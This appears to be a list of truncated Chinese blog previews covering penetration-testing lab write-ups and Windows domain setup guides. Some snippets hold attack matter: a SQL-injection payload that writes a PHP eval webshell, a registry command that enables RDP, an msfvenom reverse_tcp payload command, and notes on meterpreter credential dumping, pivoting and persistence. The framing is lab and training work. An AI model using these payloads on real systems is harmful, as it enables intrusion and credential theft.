前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…

目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为  image/jpeg 上传大马之后发现目标是linux系统 尝试反弹一个shell成功了是www权限 查看内核版本如下 上传对应的cve进行提权 脚本如下: #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sche…

进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f meterpreter模式 1.输入screenshot截个图看看主人在干什么吧. 2.wdigest //抓取明文密码(需加载m…

0x001 简介 当IPC或WMI无法访问域内机器时,可通过脚本上控. 我们可以在个人机的开机注销重启脚本里配置持久化. 域环境下同样也有开机脚本,但得在在域控机器配置 可以使用BAT\VBS等脚本,BAT执行会有黑框(不好) 解决黑框也是通过VBS来启动,不如直接用VBS脚本 为了方便域内植入加上脚本放在域控所以加密生成脚本 0x002 背景 工具于2017年编写,很久没用过了,前段时间有小伙伴问,才想起好像有写过这工具 发现怎么找都找不到(可能是硬盘损坏修复导致丢失了),好在另一个小伙伴保存…

年初九 天公生 0x034 MSF(美少妇) 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr/share 制作后门 msfvenom msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名 linux示例 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.…

域控制器 配置静态IP 安装域服务 点击服务器管理器-添加角色-下一步-添加AD域服务: 安装过后运行安装向导: 下一步后选择"在新林中新建域": 若提示密码不符合要求,则配置密码后再下一步: 设置域名称: 根据需求,选择林功能级别: 建立DNS服务: 默认选择后再次设置密码: 重启后安装成功. 添加域用户 在域管理中新建用户: 设置姓名.登录名: 设置密码: 设置域成员 域成员机器需要将DNS指向域控服务器: 在计算机属性中更改"计算机名称.域和工作组设置": 选…

先确定两台服务器相通 1.配置静态IP与DNS 2.配置域服务 点击服务器管理器-添加角色和功能-下一步-添加AD域服务: 3.提升为域控制器 安装完成后,可在旗帜处选择提升为域控制器 添加新林 添加密码 需要重启 重启之后可以进行安装,且安装完成后自动重启,重启后域环境已经配置好 4.配置域成员 将DNS指向域控 加入域 又需要重启... 使用域控的账户登录,虚拟环境问题 运行修复 重新配置DNS 终于成功 重启again 重启后可登录至域 5.降域 域控制器中输入dsa.msc 在域控制中将…

0x00 前言 将网络中的多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域(domain).域是日常计算机管理的一种很有效手段,因此,域控制器自然而然就在成域环境中最重要的角色了,如何在Windows2008 R2中搭建域控制器. 0X01 活动目录安装 准备:A.服务器设置密码  B.配置静态IP地址(虚拟机环境搭建测试) 1.单击“开始—运行”输入安装命令“dcpromo”,打开AD域服务安装向导: 2.Window会检查活动目录服务的二进制文件,等检查完毕后,如果…

这里只做记录,不做详解 0x01 路由转发 已经拿到一台公网服务器: 1.1 方法1 进到meterpreter的会话: route #查看路由信息 background退出当前会话,通过会话2,转发172.17.0.0这个路由 route add 172.17.0.0 255.255.0.0 2 #添加路由至本地 route print #打印当前路由信息 到这里 pivot 已经配置好了,在 msf 里对 172.17.0.1 进行扫描(db_nmap)或者访问(psexe 模块,ssh 模…

年初六 六六六 MSF和cs联动 msf连接cs 1.在队伍服务器上启动cs服务端 ./teamserver 团队服务器ip 连接密码 2.cs客户端连接攻击机 填团队服务器ip和密码,名字随便 msf将session发往cs客户端 1.cs设置监听 监听器 - add 选择payload类型和填攻击机ip,端口要对应payload类型 2.进入payload注入模块 use exploit/windows/local/payload_inject 3.设置参数 set disablepaylo…